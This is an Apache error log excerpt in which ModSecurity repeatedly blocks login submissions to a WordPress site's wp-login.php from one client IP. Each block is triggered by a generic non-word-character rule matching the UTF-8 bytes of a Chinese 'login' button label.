[Mon Aug 28 19:21:44.880076 2023] [:error] [pid 50571] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRWMCo-f0AAMWLMRsAAAAJ"]
[Mon Aug 28 19:21:53.202461 2023] [:error] [pid 50567] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRYcCo-f0AAMWH4-4AAAAP"]
[Mon Aug 28 19:22:03.973339 2023] [:error] [pid 50596] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRa8Co-f0AAMWkn-gAAAAM"]
[Mon Aug 28 19:22:11.809661 2023] [:error] [pid 50571] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRc8Co-f0AAMWLMSAAAAAJ"]
[Mon Aug 28 19:22:19.822617 2023] [:error] [pid 50600] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRe8Co-f0AAMWo0E4AAAAS"]
[Mon Aug 28 19:22:28.319678 2023] [:error] [pid 50598] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRhMCo-f0AAMWm1JoAAAAO"]
[Mon Aug 28 19:22:36.869229 2023] [:error] [pid 50593] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRjMCo-f0AAMWhEOQAAAAa"]
[Mon Aug 28 19:22:45.012669 2023] [:error] [pid 50612] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRlcCo-f0AAMW0KpQAAAAe"]
[Mon Aug 28 19:22:53.960115 2023] [:error] [pid 50620] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRncCo-f0AAMW8AqwAAAAm"]
[Mon Aug 28 19:23:02.476648 2023] [:error] [pid 50610] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRpsCo-f0AAMWyxkUAAAAc"]
[Mon Aug 28 19:23:10.702715 2023] [:error] [pid 50610] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRrsCo-f0AAMWyxkYAAAAc"]
[Mon Aug 28 19:23:19.835314 2023] [:error] [pid 50616] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRt8Co-f0AAMW4OzYAAAAi"]
[Mon Aug 28 19:23:29.583475 2023] [:error] [pid 50625] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRwcCo-f0AAMXB2gIAAAAB"]
[Mon Aug 28 19:23:40.165616 2023] [:error] [pid 50604] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRzMCo-f0AAMWs1gQAAAAL"]
[Mon Aug 28 19:23:43.825944 2023] [:error] [pid 50604] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRz8Co-f0AAMWs1gUAAAAL"]
[Mon Aug 28 19:23:53.375893 2023] [:error] [pid 50654] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyR2cCo-f0AAMXeF6MAAAAI"]
[Mon Aug 28 19:24:01.094451 2023] [:error] [pid 50576] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyR4cCo-f0AAMWQbIoAAAAV"]
[Mon Aug 28 19:24:08.230886 2023] [:error] [pid 50669] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyR6MCo-f0AAMXttP0AAAAU"]
[Mon Aug 28 19:24:15.129553 2023] [:error] [pid 50626] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyR78Co-f0AAMXCsUYAAAAE"]
[Mon Aug 28 19:24:24.352318 2023] [:error] [pid 50591] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyR@MCo-f0AAMWfr8gAAAAW"]
[Mon Aug 28 19:24:29.718669 2023] [:error] [pid 50671] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyR-cCo-f0AAMXvT4MAAAAX"]
[Mon Aug 28 19:24:36.574571 2023] [:error] [pid 50564] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySBMCo-f0AAMWEkJcAAAAG"]
[Mon Aug 28 19:24:43.737054 2023] [:error] [pid 50669] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySC8Co-f0AAMXttQQAAAAU"]
[Mon Aug 28 19:24:50.901463 2023] [:error] [pid 50564] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySEsCo-f0AAMWEkJgAAAAG"]
[Mon Aug 28 19:24:58.127327 2023] [:error] [pid 50679] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySGsCo-f0AAMX3u2kAAAAL"]
[Mon Aug 28 19:25:05.171188 2023] [:error] [pid 50683] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySIcCo-f0AAMX7yDcAAAAK"]
[Mon Aug 28 19:25:12.217386 2023] [:error] [pid 50679] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySKMCo-f0AAMX3u2oAAAAL"]
[Mon Aug 28 19:25:19.601012 2023] [:error] [pid 50670] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySL8Co-f0AAMXunywAAAAQ"]
[Mon Aug 28 19:25:26.716431 2023] [:error] [pid 50564] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySNsCo-f0AAMWEkJoAAAAG"]
[Mon Aug 28 19:25:33.490990 2023] [:error] [pid 50612] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySPcCo-f0AAMW0KqgAAAAe"]
[Mon Aug 28 19:25:41.136065 2023] [:error] [pid 50687] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySRcCo-f0AAMX-tGoAAAAU"]
[Mon Aug 28 19:25:48.161618 2023] [:error] [pid 50670] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySTMCo-f0AAMXuny8AAAAQ"]
[Mon Aug 28 19:25:54.906835 2023] [:error] [pid 50677] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySUsCo-f0AAMX1pJQAAAAD"]
[Mon Aug 28 19:26:02.240764 2023] [:error] [pid 50574] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySWsCo-f0AAMWO0nwAAAAT"]
[Mon Aug 28 19:26:09.125054 2023] [:error] [pid 50670] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySYcCo-f0AAMXunzEAAAAQ"]
[Mon Aug 28 19:26:19.272243 2023] [:error] [pid 50675] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySa8Co-f0AAMXz-IYAAAAA"]
[Mon Aug 28 19:26:23.855612 2023] [:error] [pid 50675] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySb8Co-f0AAMXz-IcAAAAA"]
[Mon Aug 28 19:26:30.968228 2023] [:error] [pid 50675] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySdsCo-f0AAMXz-IgAAAAA"]
[Mon Aug 28 19:26:38.796932 2023] [:error] [pid 50685] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySfsCo-f0AAMX9CGsAAAAN"]
